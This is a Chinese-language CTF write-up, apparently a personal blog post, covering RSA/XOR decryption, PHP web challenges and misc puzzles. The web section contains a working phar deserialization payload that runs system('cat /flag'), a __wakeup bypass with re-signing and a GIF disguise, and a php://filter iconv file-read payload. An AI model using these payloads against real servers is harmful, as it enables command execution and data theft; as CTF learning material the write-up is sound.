Crypto
简单的rsa搭配异或加解密,
# encoding:utf-8
from Crypto.Util.number import *
from Crypto.Util.strxor import strxor
d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
ciphertext = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451
def decrypt(c, N, d):
m = pow(c, d, N)
decrypted_msg = long_to_bytes(m)
key = b'Life is like an ocean only strong-minded can reach the other shore'
decrypted_msg = strxor(decrypted_msg, key[:decrypted_msg.__len__()])
return decrypted_msg.decode()
decrypted_message = decrypt(ciphertext, N, d)
print(decrypted_message)
flag{1s_Pa33w0rd_1y2u22}
web
unserialize_web
扫目录下载www.tar.gz
跟着这篇文章打就行了
php(phar)反序列化漏洞及各种绕过姿势 (pankas.top)
生成phar文件
<?php
class File{
public $val1;
public $val2;
public $val3;
public function __construct($ccy, $bkq, $cmd){
$this->val1 = $ccy;
$this->val2 = $bkq;
$this->val3 = $cmd;
}
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>"); //设置stub
$o = new File("file", "exists", "system('cat /flag');");
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
绕wakeup和修改签名,wakeup改个数即可绕过
from hashlib import sha1
import gzip
f = open("phar.phar", 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
s = s.replace(b'3:{', b'4:{')
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s + sha1(s).digest() + h # 数据 + 签名 + 类型 + GBMB
# gzip.compress(
open("phar.gif", 'wb').write(gzip.compress(newf)) # 写入新文件
消失的flag
Xff头绕过access,给file传参
PHP代码审计 - ^cyi^ - 博客园 (cnblogs.com)
然后就是对着我自己的文章一顿操作,string filiter、read、quoted被ban了,只能用convert.iconv了
Fuzz得到payload
?file=php://filter/convert.iconv.UCS-4*.UCS-4*/resource=/flag
Mypdf(fail)
www.zip下载源码,然后就没有然后了,审不动
hackme(fail)
弱口令,admin 123456
MISC
猜一猜
下载得到压缩包,压缩包名就是密码,
扫一扫,❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=
前几个比赛打过,花朵解密
文本加密为花朵符号,可自设密码|文本在线加密解密工具 (qqxiuzi.cn)
你要的就在这(fail)
在图片尾提示stegpy
上面积分的结果是π,6应该是提示秘钥位数
得到秘钥luckyone
0 1,通道有东西,单0,单1,01结合都没提出有用的东西
![[sunj小白瞎搞系列 一]](https://img2024.cnblogs.com/blog/3400271/202405/3400271-20240513231522754-303920133.png)
